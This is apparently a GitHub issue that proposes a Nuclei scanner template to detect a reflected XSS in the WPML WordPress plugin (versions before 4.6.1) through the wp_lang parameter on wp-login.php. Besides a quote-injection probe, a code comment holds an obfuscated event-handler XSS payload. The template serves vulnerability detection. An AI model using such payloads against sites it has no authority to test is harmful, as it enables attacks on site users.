### ISSUE TITLE
WordPress Plugin WPML Version < 4.6.1  RXSS

### ISSUE THREAD

**Issue by akincibor** [projectdiscovery/nuclei-templates#7160]
### Nuclei Template:

```yaml
id: wpml-xss
info:
  name: WordPress Plugin WPML Version < 4.6.1 RXSS
  author: deepak aka bugvsme
  severity: high
  description: WordPress Plugin WPML Version < 4.6.1  is vulnerable to RXSS via wp_lang parameter.
  reference:
    - https://wpml.org/fr/changelog/2023/03/wpml-4-6-1-important-security-update/
  remediation: Update the WPML plugin to the latest version.
  tags: xss,wp,wordpress

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-login.php?wp_lang=en_US%27' # /wp-login.php?wp_lang=%20=id=x+type=image%20id=xss%20onfoc%3C!%3Eusin+alert(0)%0c

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - '#039;"='
```
